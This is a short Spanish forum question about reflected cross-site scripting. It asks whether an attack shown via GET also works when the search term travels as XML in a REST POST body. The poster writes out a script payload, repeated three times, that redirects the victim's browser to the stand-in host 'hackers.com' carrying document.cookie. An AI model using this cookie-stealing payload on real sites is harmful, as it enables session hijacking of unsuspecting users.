Sé que un XSS reflejado se puede hacer con una solicitud GET como:
http://site.com?search=<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script>
Mientras la respuesta se vea similar a esto:
<html>
<head>
<title>Your Serach Results</title>
</head>
<body>
<h2>No results for: </h2>
<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script>
</body>
</html>
Pero es posible este ataque, en caso de que el término de búsqueda se envíe a lo largo de una solicitud POST en el cuerpo http como parte del contenido XML. Este servicio es utilizado a menudo por los servicios REST.
<Query>
<SearchTerm>
script>location.href='http://hackers.com?sessionToken='+document.cookie;</script>
</SearchTerm>
</Query>
Si esto es posible, ¿cómo puede un atacante lograr esto?
Icono_de_imagen>
También se requiere que el encabezado Content-Type
esté establecido en application/xml